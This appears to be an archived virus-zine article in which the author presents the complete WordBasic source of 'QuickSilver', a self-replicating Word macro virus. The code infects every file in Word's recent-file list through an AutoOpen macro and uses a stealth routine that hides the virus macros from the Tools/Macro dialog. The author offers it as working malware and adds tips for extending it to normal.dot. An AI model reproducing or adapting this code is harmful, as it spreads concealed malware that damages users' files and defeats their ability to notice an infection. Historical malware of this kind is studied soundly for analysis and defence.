Copy Link
Add to Bookmark
Report
SLAM2.030: Full-Stealth WordMacro Virus QuickSilver by NJ [SLAM]
[ WordMacro. QuickSilver ]--------------
˛ VIRUSNAME: QuickSilver
˛ SIZE: 1032 Bytes
˛ ORIGIN: Germany
˛ AUTHOR: Nightmare Joker
->Polymorf No
->Stealth Yes
->Encrypted Yes
->Retro No
-----------------------------------------
Here is it! My new full-stealth macro virus QuickSilver.
If the virus become active, it search's the name of the actually ToolsMacro menu, and infect then all files in the FileList.
If someone try to look in the ToolsMacro Box to see if he maybe infected with a virus, then will QuickSilver immediately open a new document to hide his macros. The user will see NOTHING!
Btw, it works with every Word Version.
-------------------------------------------------------------------------
MACRO: AutoOpen
~~~~~~~~~~~~~~~
Sub MAIN
REM Set ScreenUpdating Off and DisableInput On
ScreenUpdating : DisableInput
REM s1$ = e.g. "&Tools" (english version of word)
s1$ = MenuText$(0, 6)
REM and s2$ = e.g. "&Macro..." (english version of word)
s2$ = MenuItemText$(s1$, 0, 13)
REM Remove now some characters, which we don't need. ("&" and ".")
s3$ = s1$ + s2$
For i = 1 To Len(s3$)
s4$ = Mid$(s3$, i, 1)
If s4$ <> "&" And s4$ <> "." Then
s5$ = s5$ + s4$
End If
Next i
REM Use now the right name and save it!
s6$ = GetDocumentVar$("Steahlt")
If s5$ = s6$ Then Goto Continue
ToolsMacro .Name = s6$, .Show = 3, .NewName = s5$, .Rename
SetDocumentVar "Steahlt", s5$
REM Start the Quicksilver macro,
REM set ScreenUpdating On and DisableInput Off.
Continue:
QuickSilver
ScreenUpdating : DisableInput 0
End Sub
-------------------------------------------------------------------------
MACRO: QuickSilver
~~~~~~~~~~~~~~~~~~
Sub MAIN
REM Set DisableAutoMacros On
DisableAutoMacros
REM Open now every file in the file list
REM and check if it's allready infected.
Steahlt$ = GetDocumentVar$("Steahlt")
Quick$ = FileName$()
For x = 1 To CountFiles()
If Files$(FileName$(x)) <> "" Then
FileList x
Silver$ = FileName$()
If Quick$ <> Silver$ Then
Check$ = GetDocumentVar$("RAVE")
If Check$ = "" Then
REM If the active file isn't allready infected then
REM save it as a template and copy the virus macros
REM to it!
FileSaveAs .Format = 1
MacroCopy Quick$ + ":AutoOpen", Silver$ + ":", 1
MacroCopy Quick$ + ":QuickSilver", Silver$ + ":", 1
MacroCopy Quick$ + ":" + Steahlt$, Silver$ + ":", 1
REM Save the name of the >> Steahlt Box <<, too.
SetDocumentVar "RAVE", Str$(Rnd())
SetDocumentVar "Steahlt", Steahlt$
End If
REM At last save and close the file.
FileClose 1
End If
End If
Next x
REM Set DisableAutoMacros Off
DisableAutoMacros 0
REM #######################################
REM ############ QUICKSILVER ##############
REM ################ BY ###################
REM ########## NIGHTMARE JOKER ############
REM ############## (SLAM) #################
REM #######################################
End Sub
-------------------------------------------------------------------------
MACRO: >> Steahlt Box <<
~~~~~~~~~~~~~~~~~~~~~~~~
Sub MAIN
REM Set ErrorHandler
On Error Resume Next
REM Set ScreenUpdating Off
ScreenUpdating
REM Create a new file to hide the infected document.
FileNew
REM Create the Box!
Dim dlg As ToolsMacro
GetCurValues dlg
Dialog dlg
REM Close the empty file.
FileClose 2
REM Set ScreenUpdating On
ScreenUpdating
REM And now show the user the >> clean << Box! :)
ToolsMacro dlg
End Sub
REM BTW, this full-stealth method works only with Direct Action macro
REM viruses! If you want infect the global file normal.dot too then use
REM Virtual Boy's full-stealth routine! :)
-------------------------------------------------------------------------
- Nightmare Joker -